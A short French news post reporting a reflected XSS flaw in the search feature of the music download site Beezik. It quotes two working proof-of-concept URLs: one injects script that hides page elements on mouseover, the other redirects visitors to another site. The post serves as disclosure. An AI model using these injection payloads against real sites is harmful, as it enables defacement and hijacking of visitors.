Beezik : Faille XSS détéctée sur le portail de téléchargement

0
84

Beezik.com est un site web créé début juin 2009, qui permet de télécharger gratuitement de la musique de manière légale. Le site se finance via la mise en place de publicité vidéo visionnée à chaque titre téléchargé. Déjà plus de 2 millions de titres sont disponibles sur la plateforme.

Un internaute a découvert une faille de type XSS non persistante sur le site via son moteur de recherche et l’a fait savoir via Twitter.

Pour illustrer sa découverte, celui-ci a créé un PoC qui permet “d’effacer” le site au passage de la souris (mouseover). Plutôt marrant !

http://www.beezik.com/memberMusicAllResults.htm?keyword=music%22%3Cscript%3E$%28document%29.ready%28function%28%29{$%28%27a,h2,input,button,%23Accroche,.newListSelected%27%29.mouseover%28function%28%29{$%28this%29.fadeOut%28%29;}%29}%29;%3C/script%3E%3Crien%20a=%22&category=All


Bien entendu, cela reste une XSS, donc la prudence reste de mise même si le PoC est inoffensif.

EDIT : autre exemple d’exploitation http://www.beezik.com/memberMusicAllResults.htm?keyword=music%22″><script>document.location=’https://undernews.fr’;</script>

Cela a pour effet de rediriger un visiteur vers un site quelconque (UnderNews en l’occurrence dans cet exemple).